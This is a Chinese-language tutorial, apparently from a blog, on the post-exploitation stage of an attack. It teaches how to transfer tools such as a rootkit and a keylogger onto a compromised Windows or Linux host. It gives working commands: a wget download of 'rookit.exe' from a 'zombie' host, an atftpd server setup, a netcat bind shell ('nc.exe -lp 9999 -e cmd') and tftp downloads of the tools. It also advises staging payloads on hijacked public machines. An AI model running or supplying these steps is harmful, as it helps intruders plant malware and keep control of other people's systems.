经过之前的步骤,我们应该已经可以发现主机的漏洞,并且获取到一定的权限
下面就进入了后渗透测试阶段
在后渗透测试阶段我们主要的目标就是上传工具,权限提升,擦除攻击痕迹,安装持久化后门
以上的每一个步骤都至关重要!
上传工具
可能此时我们通过一个REC漏洞获取了一个shell,不过仅仅一个shell的功能是有限的,为了扩大战果,我们需要上传更为有力的工具,比如mimikatz,wce,为以后的攻击做准备
这里我们针对的系统主要是Windows和 Linux
在Linux上我们可以使用nc, curl, wget,这些在很多Linux发行版本中都是默认安装的,用来远程从我们的肉鸡上下载一个tool简直不能再方便了
wget http://123.123.34.3/rookit.exe
最简单的使用方法
所以我们接下来讲述的主要针对Windows
在Kali的 /usr/share/windows-binaries/ 文件夹下有一些Windows上常用的一些工具,比如键盘记录,whoami等
1.TFTP
TFTP是基于UDP协议的一个协议,与FTP协议类似,都可以提供文件传输
我们没有首先采用FTP协议来进行远程下载工具就是因为FTP需要交互输入密码,有时候我们获取到的shell并非交互的,所以很难实现
TFTP 是不需要身份验证的,也就是说服务器上有文件直接下载就行
TFTP 在XP和Win2003系统中是自动安装的,win2003还是有很大一部分服务器在使用的,所以我就以2003来进行演示
这个是安装win2003的截图,很熟悉的界面,上一次安装好想还是我在弄第一期培训
客户端安装完成后我们开始配置我们的TFTP服务器端,我们用Kali就可以完成这个服务器的假设
在假设服务器之前我们应该明确一点,我们的服务器不能被反黑掉,所以在权限控制和访问控制方面需要做一下限定
1. 新建一个目录
mkdir ~/tftp
2. 修改权限为nobody,这是一个未登录的权限,权限只能用来下载
chown –R nobody ~/tftp
3. 将我们需要传递的工具复制到目录中
cp /usr/share/windows-binaries/whoami.exe ~/tftp
4. 开启服务
atftpd --daemon --port 69 ~/tftp
--deamon 以后台形式启动
--port 端口是69
5. 检测服务是否成功开启
netstat –pantu | grep 69
#### 这里有一个问题,我必须强调一下
此处指定的路径必须是绝对路径,我在上面执行指定的是一个相对路径,这样会导致后续下载不到文件
所以上面应该变为
atftpd --daemon --port 69 /root/Desktop/tftp/
我们就用nc来在window2003上模拟一个非交互性的shell
nc.exe –lp 9999 –e cmd
遗憾的是我发现,在win2003r2 版本中并没有默认安装tftp
当我想要看看win2003版本时候发现没有可用的密钥,所以我就用一台XP来进行演示
nc.exe –lp 9999 –e cmd
这边我们用Kali的nc去连接一下,模拟出一个远程shell
我们在shell中执行
tftp -i 192.168.123.53 get whoami.exe
-i 二进制格式
tftp -i 192.168.123.53 get klogger.exe
可以看到已经下载成功了,之后我们执行一下看看效果吧
以上只是一个简单的小例子,通常来说我们应该把我们的程序放在公网上的一台肉鸡中,在攻击之前在肉鸡上开启服务,下载之后关闭。
更多方法敬请期待!
-END-